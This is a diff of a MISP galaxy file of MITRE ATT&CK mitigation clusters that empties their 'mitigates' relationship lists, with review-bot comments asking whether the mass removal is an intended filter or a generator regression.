"uuid": "d9727aee-48b8-4fdb-89e2-4c49746ba4dd",
"value": "Data from Network Shared Drive Mitigation - T1039"
},
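Review bot: replacing the `related` list with `"related": []` removes the only mapping this cluster had (dest-uuid ae676644-d2d2-41b7-af7e-9bed1b55898c, presumably the T1039 attack pattern the mitigation is named for) and leaves a "<Technique> Mitigation - TXXXX" cluster with nothing but a name, a uuid and references; the same replacement is made for more than fifty such clusters in the rest of this patch, from T1084 down to T1105. If the intent is to stop emitting relationships that upstream has revoked or deprecated, say so in the commit message and consider applying the same criterion to these mitigation clusters themselves (drop them, or mark them deprecated) instead of shipping orphan clusters that MISP instances will keep synchronising; some of them are named for techniques that may still be current, in which case downstream users lose a mitigation-to-technique link they were relying on. If no such filter change was intended, this is a regression in the generator and should be fixed before merge.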
@@ -760,15 +630,7 @@
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf"
]
},
- "related": [
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "0bc3ce00-83bc-4a92-a042-79ffbc6af259",
"value": "Windows Management Instrumentation Event Subscription Mitigation - T1084"
},
@@ -781,15 +643,7 @@
"https://attack.mitre.org/mitigations/T1094"
]
},
- "related": [
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f3d0c735-330f-43c2-8e8e-51bcfa51e8c3",
"value": "Custom Command and Control Protocol Mitigation - T1094"
},
@@ -805,15 +659,7 @@
"https://attack.mitre.org/mitigations/T1183"
]
},
- "related": [
- {
- "dest-uuid": "62166220-e498-410f-a90a-19d4339d4e99",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "33f76731-b840-446f-bee0-53687dad24d9",
"value": "Image File Execution Options Injection Mitigation - T1183"
},
@@ -826,15 +672,7 @@
"https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf"
]
},
- "related": [
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ef273807-c465-4728-9cee-5823422f42ee",
"value": "SIP and Trust Provider Hijacking Mitigation - T1198"
},
@@ -847,15 +685,7 @@
"https://attack.mitre.org/mitigations/T1095"
]
},
- "related": [
- {
- "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "399d9038-b100-43ef-b28d-a5065106b935",
"value": "Standard Non-Application Layer Protocol Mitigation - T1095"
},
@@ -872,15 +702,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d01f473f-3cdc-4867-9e55-1de9cf1986f0",
"value": "Deobfuscate/Decode Files or Information Mitigation - T1140"
},
@@ -969,15 +791,7 @@
"https://attack.mitre.org/mitigations/T1030"
]
},
- "related": [
- {
- "dest-uuid": "c3888c54-775d-4b2f-b759-75a2ececcbfd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ba06d68a-4891-4eb5-b634-152e05ec60ee",
"value": "Data Transfer Size Limits Mitigation - T1030"
},
@@ -994,15 +808,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7ee0879d-ce4f-4f54-a96b-c532dfb98ffd",
"value": "Data from Local System Mitigation - T1005"
},
@@ -1019,15 +825,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0c8ab3eb-df48-4b9c-ace7-beacaac81cc5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "902286b2-96cc-4dd7-931f-e7340c9961da",
"value": "File System Logical Offsets Mitigation - T1006"
},
@@ -1051,29 +849,7 @@
"https://attack.mitre.org/mitigations/T1070"
]
},
- "related": [
- {
- "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "6cac62ce-550b-4793-8ee6-6a1b8836edb0",
"value": "Indicator Removal on Host Mitigation - T1070"
},
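Review bot: three mappings are dropped from Indicator Removal on Host Mitigation - T1070 at once, and one of them, 2bce5b30-7014-4a5d-ade7-12913fe6ac36, still appears as unchanged context in another cluster's `related` list later in this patch, so its target attack pattern has not gone away. The filter producing this hunk must therefore be keyed on the source mitigation being deprecated or on the individual relationship objects, not on the target; please state which, because for clusters that map to several targets the two rules give different results and only the per-relationship rule can be checked against the upstream data.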
@@ -1088,15 +864,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "14b63e6b-7531-4476-9e60-02cc5db48b62",
"value": "Exploitation of Remote Services Mitigation - T1210"
},
@@ -1113,15 +881,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "684feec3-f9ba-4049-9d8f-52d52f3e0e40",
"value": "System Network Configuration Discovery Mitigation - T1016"
},
@@ -1140,15 +900,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "effb83a0-ead1-4b36-b7f6-b7bdf9c4616e",
"value": "Replication Through Removable Media Mitigation - T1091"
},
@@ -1161,13 +913,6 @@
]
},
"related": [
- {
- "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
"tags": [
@@ -1182,13 +927,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0c2d00da-7742-49e7-9928-4514e5075d32",
"tags": [
@@ -1203,13 +941,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -1252,13 +983,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36",
"tags": [
@@ -1266,13 +990,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3298ce88-1628-43b1-87d9-0b5336b193d7",
"tags": [
@@ -1371,13 +1088,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "58af3705-8740-4c68-9329-ec015a7013c2",
"tags": [
@@ -1420,13 +1130,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -1434,20 +1137,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
"tags": [
@@ -1462,13 +1151,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc",
"tags": [
@@ -1477,14 +1159,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
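Review bot: the substitution across the 8df54627, 9e80ddfb and a19e86f8 lines is really two deletions plus one insertion: a19e86f8-1c0a-4fea-8407-23b73d615776 is new and the other two are gone. It sorts after the preceding 837f9164 entry, but the entry that follows it is outside the hunk context, so confirm the list is still in order after it and that a19e86f8 resolves to an attack-pattern cluster, as for the other new dest-uuids in this patch.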
@@ -1497,13 +1172,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
"tags": [
@@ -1525,13 +1193,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b63a34e8-0a61-4c97-a23b-bf8a2ed812e2",
"tags": [
@@ -1539,13 +1200,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
"tags": [
@@ -1567,20 +1221,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c63a348e-ffc2-486a-b9d9-d7f11ec54d99",
"tags": [
@@ -1588,13 +1228,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d10cbd34-42e3-45c0-84d2-535a09849584",
"tags": [
@@ -1623,13 +1256,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d3046a90-580c-4004-8208-66915bc29830",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dca670cf-eeec-438f-8185-fd959d9ef211",
"tags": [
@@ -1637,13 +1263,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
"tags": [
@@ -1672,20 +1291,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
@@ -1716,15 +1321,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f2dcee22-c275-405e-87fd-48630a19dfba",
"value": "Exploitation for Client Execution Mitigation - T1203"
},
@@ -1742,22 +1339,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "68c96494-1a50-403e-8844-69a6af278c68",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "98034fef-d9fb-4667-8dc4-2eab6231724c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d7c49196-b40e-42bc-8eed-b803113692ed",
"value": "Change Default File Association Mitigation - T1042"
},
@@ -1774,15 +1356,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "1b7ba276-eedc-4951-a762-0ceea2c030ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "39706d54-0d06-4a25-816a-78cc43455100",
"value": "Data from Removable Media Mitigation - T1025"
},
@@ -1796,15 +1370,7 @@
"https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx"
]
},
- "related": [
- {
- "dest-uuid": "e6415f09-df0e-48de-9aba-928c902b7549",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e547ed6a-f1ca-40df-8613-2ce27927f145",
"value": "Exfiltration Over Physical Medium Mitigation - T1052"
},
@@ -1818,15 +1384,7 @@
"https://technet.microsoft.com/en-us/library/cc772540(v=ws.10).aspx"
]
},
- "related": [
- {
- "dest-uuid": "64196062-5210-42c3-9a02-563a0d1797ef",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b8d57b16-d8e2-428c-a645-1083795b3445",
"value": "Communication Through Removable Media Mitigation - T1092"
},
@@ -1843,15 +1401,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1",
"value": "File and Directory Discovery Mitigation - T1083"
},
@@ -1869,15 +1419,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "96913243-2b5e-4483-a65c-bb152ddd2f04",
"value": "DLL Search Order Hijacking Mitigation - T1038"
},
@@ -1894,15 +1436,7 @@
"https://github.com/mattifestation/PowerSploit"
]
},
- "related": [
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1022138b-497c-40e6-b53a-13351cbd4090",
"value": "File System Permissions Weakness Mitigation - T1044"
},
@@ -1919,15 +1453,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c1676218-c16a-41c9-8f7a-023779916e39",
"value": "System Network Connections Discovery Mitigation - T1049"
},
@@ -1942,15 +1468,7 @@
"https://attack.mitre.org/mitigations/T1058"
]
},
- "related": [
- {
- "dest-uuid": "39a130e1-6ab7-434a-8bd2-418e7d9d6427",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9378f139-10ef-4e4b-b679-2255a0818902",
"value": "Service Registry Permissions Weakness Mitigation - T1058"
},
@@ -1967,15 +1485,7 @@
"https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm"
]
},
- "related": [
- {
- "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4b998a71-7b8f-4dcc-8f3f-277f2e740271",
"value": "Indicator Removal from Tools Mitigation - T1066"
},
@@ -1990,15 +1500,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "92e6d080-ca3f-4f95-bc45-172a32c4e502",
"value": "Exploitation for Privilege Escalation Mitigation - T1068"
},
@@ -2011,15 +1513,7 @@
"https://github.com/hfiref0x/UACME"
]
},
- "related": [
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "beb45abb-11e8-4aef-9778-1f9ac249784f",
"value": "Bypass User Account Control Mitigation - T1088"
},
@@ -2034,15 +1528,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "fe926152-f431-4baf-956c-4ad3cb0bf23b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "37a3f3f5-76e6-43fe-b935-f1f494c95725",
"value": "Exploitation for Defense Evasion Mitigation - T1211"
},
@@ -2059,15 +1545,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "52f3d5a6-8a0f-4f82-977e-750abf90d0b0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cba5667e-e3c6-44a4-811c-266dbc00e440",
"value": "Extra Window Memory Injection Mitigation - T1181"
},
@@ -2082,15 +1560,7 @@
"https://en.wikipedia.org/wiki/Control-flow_integrity"
]
},
- "related": [
- {
- "dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "06160d81-62be-46e5-aa37-4b9c645ffa31",
"value": "Exploitation for Credential Access Mitigation - T1212"
},
@@ -2107,15 +1577,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9b52fca7-1a36-4da0-b62d-da5bd83b4d69",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ff5d862a-ae6b-4833-8c15-e235d654d28e",
"value": "Component Object Model Hijacking Mitigation - T1122"
},
@@ -2127,15 +1589,7 @@
"https://attack.mitre.org/mitigations/T1213"
]
},
- "related": [
- {
- "dest-uuid": "d28ef391-8ed4-45dc-bc4a-2f43abf54416",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "13cad982-35e3-4340-9095-7124b653df4b",
"value": "Data from Information Repositories Mitigation - T1213"
},
@@ -2150,15 +1604,7 @@
"https://patchwork.kernel.org/patch/8754821/"
]
},
- "related": [
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "44155d14-ca75-4fdf-b033-ab3d732e2884",
"value": "Kernel Modules and Extensions Mitigation - T1215"
},
@@ -2175,22 +1621,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "a750a9f6-0bde-4bb3-9aae-1e2786e9780c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94e95eeb-7cdb-4bd7-afba-f32fda303dbb",
"value": "Network Share Connection Removal Mitigation - T1126"
},
@@ -2202,15 +1633,7 @@
"https://attack.mitre.org/mitigations/T1216"
]
},
- "related": [
- {
- "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "51048ba0-a5aa-41e7-bf5d-993cd217dfb2",
"value": "Signed Script Proxy Execution Mitigation - T1216"
},
@@ -2222,15 +1645,7 @@
"https://attack.mitre.org/mitigations/T1129"
]
},
- "related": [
- {
- "dest-uuid": "0a5231ec-41af-4a35-83d0-6bdf11f28c65",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "cfd2cd3b-93e7-4b3e-ab46-f8bcafdbdfcf",
"value": "Execution through Module Load Mitigation - T1129"
},
@@ -2247,15 +1662,7 @@
"https://technet.microsoft.com/library/cc771387.aspx"
]
},
- "related": [
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "910482b1-6749-4934-abcb-3e34d58294fc",
"value": "Distributed Component Object Model Mitigation - T1175"
},
@@ -2267,15 +1674,7 @@
"https://attack.mitre.org/mitigations/T1185"
]
},
- "related": [
- {
- "dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "94f6b4f5-b528-4f50-91d5-f66457c2f8f7",
"value": "Man in the Browser Mitigation - T1185"
},
@@ -2287,15 +1686,7 @@
"https://attack.mitre.org/mitigations/T1158"
]
},
- "related": [
- {
- "dest-uuid": "dc27c2ec-c5f9-4228-ba57-d67b590bda93",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "84d633a4-dd93-40ca-8510-40238c021931",
"value": "Hidden Files and Directories Mitigation - T1158"
},
@@ -2313,15 +1704,7 @@
"https://www.ready.gov/business/implementation/IT"
]
},
- "related": [
- {
- "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "429a5c0c-e132-45c0-a4aa-c1f736c92a1c",
"value": "Data Encrypted for Impact Mitigation - T1486"
},
@@ -2334,15 +1717,7 @@
"https://attack.mitre.org/mitigations/T1498"
]
},
- "related": [
- {
- "dest-uuid": "d74c4a7e-ffbf-432f-9365-7ebf1f787cab",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "654addf1-47ab-410a-8578-e1a0dc2a49b8",
"value": "Network Denial of Service Mitigation - T1498"
},
@@ -2355,43 +1730,7 @@
"https://attack.mitre.org/mitigations/T1499"
]
},
- "related": [
- {
- "dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "18cffc21-3260-437e-80e4-4ab8bf2ba5e9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "38eb0c22-6caf-46ce-8869-5964bd735858",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c675646d-e204-4aa8-978d-e3d6d65885c4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "82c21600-ccb6-4232-8c04-ef3792b56628",
"value": "Endpoint Denial of Service Mitigation - T1499"
},
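Review bot: unlike the single-mapping clusters above, Endpoint Denial of Service Mitigation - T1499 mapped to five attack patterns and loses all five in this hunk. If those five are the technique together with sub-techniques that are still current, this discards usable mitigation coverage; if all five targets were revoked upstream, the removal is correct. The output cannot distinguish the two cases, since both collapse to `"related": []`, so the rule the generator applies to relationships from a deprecated mitigation to a current technique needs to be written down, and this cluster is the one to test it against.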
@@ -2403,15 +1742,7 @@
"https://attack.mitre.org/mitigations/T1190"
]
},
- "related": [
- {
- "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "65da1eb6-d35d-4853-b280-98a76c0aef53",
"value": "Exploit Public-Facing Application Mitigation - T1190"
},
@@ -2428,15 +1759,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "dd43c543-bb85-4a6f-aa6e-160d90d06a49",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e8d22ec6-2236-48de-954b-974d17492782",
"value": "Two-Factor Authentication Interception Mitigation - T1111"
},
@@ -2448,15 +1771,7 @@
"https://attack.mitre.org/mitigations/T1156"
]
},
- "related": [
- {
- "dest-uuid": "01df3350-ce05-4bdf-bdf8-0a919a66d4a8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "4f170666-7edb-4489-85c2-9affa28a72e0",
"value": ".bash_profile and .bashrc Mitigation - T1156"
},
@@ -2473,15 +1788,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "16f144e4-c780-4ed2-98b4-55d14e2dfa44",
"value": "System Owner/User Discovery Mitigation - T1033"
},
@@ -2498,15 +1805,7 @@
